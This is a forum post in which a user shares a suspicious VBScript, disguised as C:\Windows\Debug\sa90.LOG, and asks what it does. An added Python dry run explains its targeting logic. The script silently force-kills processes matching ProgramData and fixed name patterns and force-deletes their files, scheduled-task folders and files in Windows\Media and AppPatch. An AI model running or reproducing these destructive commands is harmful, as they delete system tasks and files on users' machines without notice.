
[Other] When I logged in to JD.com, 360 warned that a suspicious process was about to run: sa90.LOG, which is a VBS script

This post was last edited by 再世情緣 on 2020-1-12 16:31
    DIM objShell
    set objShell=wscript.createObject("wscript.shell")
    strComputer = "."
    ' Query WMI for every process whose command line contains "ProgramData"
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")
    Set colItems = objWMIService.ExecQuery( _
        "SELECT * FROM Win32_Process where CommandLine like ""%ProgramData%""",,48)
    For Each objItem in colItems
        ' Split the command line on "\" and keep only four-segment paths
        ' (drive \ folder \ subfolder \ file)
        a=Split(objItem.CommandLine,"\")
        'Wscript.Echo UBound(a)
        if UBound(a)=3 then
            processName = replace(a(3),"""","")
            Wscript.Echo processName
            ' Match when the file name contains the parent folder name minus its first character
            if  instr(a(3),right(a(2),len(a(2))-1)) then
                ' Force-kill the process by image name, then delete the file it was started from
                cmd = "taskkill.exe /F /IM " &processName
                Wscript.Echo cmd
                cmd2 = "cmd.exe /c del /F /Q "&objItem.CommandLine
                Wscript.Echo objItem.CommandLine
                iReturn=objShell.Run(cmd, 0, TRUE)
                iReturn=objShell.Run(cmd2, 0, TRUE)
            end if
        end if
    Next
    ' Empty every scheduled-task folder under Microsoft\Windows whose name contains "-"
    Dim Fso,MyFolder,Folders
    Set Fso = CreateObject ("Scripting.FileSystemObject")
    Set MyFolder = Fso.GetFolder("C:\Windows\System32\Tasks\Microsoft\Windows")
    Set Folders = MyFolder.SubFolders
    For Each Folder in Folders
        if InStr(Folder.name,"-")>0 then
            'Wscript.Echo "C:\Windows\System32\Tasks\Microsoft\Windows\"&Folder.name
            cmd= "cmd.exe /c del /F /Q C:\Windows\System32\Tasks\Microsoft\Windows\"&Folder.name&"\*"
            iReturn=objShell.Run(cmd, 0, TRUE)
        end if
    Next
    'Set ws=WScript.CreateObject("wscript.shell")
    'w="C:\Windows\System32\Tasks\Microsoft\Windows"
    'Set fso=WScript.CreateObject("scripting.filesystemobject")
    'Set fs=fso.GetFolder(w)
    'Set f=fs.SubFolders
    'For Each uu In f
    ' if instr(uu.Path,"-") then
    ' cmd3 = "cmd.exe /c del /F /Q "&uu.Path&vbCrLf
    ' iReturn=objShell.Run(cmd3, 0, TRUE)
    ' end if
    'Next
    ' Kill processes by fixed name patterns, then delete fixed task files, *.exe in Media and *.vbs in AppPatch
    iReturn=objShell.Run("taskkill.exe /F /IM CmdRun*", 0, TRUE)
    iReturn=objShell.Run("taskkill.exe /F /IM RCDLL*", 0, TRUE)
    iReturn=objShell.Run("taskkill.exe /F /IM regcap*", 0, TRUE)
    iReturn=objShell.Run("cmd.exe /c del /F /Q C:\Windows\System32\Tasks\Microsoft\Windows\WindowsBackup\Provisioning\*", 0, TRUE)
    iReturn=objShell.Run("cmd.exe /c del /F /Q ""c:\Windows\System32\Tasks\Microsoft\Windows\Time Trigger Test Task""", 0, TRUE)
    iReturn=objShell.Run("cmd.exe /c del /F /Q ""c:\Windows\System32\Tasks\Microsoft\Windows\programdata*""", 0, TRUE)
    iReturn=objShell.Run("cmd.exe /c del /F /Q c:\Windows\Media\*.exe", 0, TRUE)
    iReturn=objShell.Run("cmd.exe /c del /F /Q c:\Windows\AppPatch\*.vbs", 0, TRUE)
    Set objShell=NoThing
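When I logged in to JD.com, 360 popped up asking whether to block it, and I clicked block. The path is C:\Windows\Debug\sa90.LOG. I found the file, and after opening it with Notepad it turned out to be this code.
What does this code mean?

The last part ends processes and deletes files, I know that, but I can't understand the part before it.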
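
The selection logic in the first half of the posted script, re-expressed as a dry run in Python: this is an added example, not part of the original post, and it only reports which commands the script would build without running any of them. The function names and the sample command lines and folder names are constructed for illustration.

```python
TASK_ROOT = r"C:\Windows\System32\Tasks\Microsoft\Windows"

def would_target(command_line):
    """Return the image name the script would kill for this command line, else None."""
    # WQL: CommandLine LIKE "%ProgramData%" (% is a wildcard; WQL matching ignores case)
    if "programdata" not in command_line.lower():
        return None
    a = command_line.split("\\")
    if len(a) - 1 != 3:        # UBound(a)=3: exactly four "\"-separated segments
        return None
    if a[2] == "":             # Right(a(2), -1) is a runtime error in VBScript; skipped here
        return None
    # InStr(a(3), Right(a(2), Len(a(2))-1)): the file name must contain the
    # parent folder name minus its first character (case-sensitive compare)
    if a[2][1:] not in a[3]:
        return None
    return a[3].replace('"', "")   # processName with the quotes stripped

def planned_actions(command_lines, task_subfolders):
    """List, in order, the commands the script would pass to objShell.Run."""
    actions = []
    for cl in command_lines:
        image = would_target(cl)
        if image is not None:
            actions.append("taskkill.exe /F /IM " + image)
            actions.append("cmd.exe /c del /F /Q " + cl)
    for name in task_subfolders:
        if "-" in name:            # InStr(Folder.name,"-")>0
            actions.append("cmd.exe /c del /F /Q " + TASK_ROOT + "\\" + name + "\\*")
    return actions

# Constructed sample data (not taken from any real system)
SAMPLE_PROCESSES = [
    r'"C:\ProgramData\abcd\abcd.exe"',          # folder and file names match: targeted
    r"C:\ProgramData\Vendor\updater.exe",       # file name does not contain "endor"
    r"C:\ProgramData\abcd\bin\abcd.exe",        # five segments: UBound is 4, skipped
    r"C:\Windows\System32\svchost.exe -k netsvcs",
]
SAMPLE_TASK_FOLDERS = ["Defrag", "ab12-cd34"]

if __name__ == "__main__":
    for action in planned_actions(SAMPLE_PROCESSES, SAMPLE_TASK_FOLDERS):
        print(action)
```
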
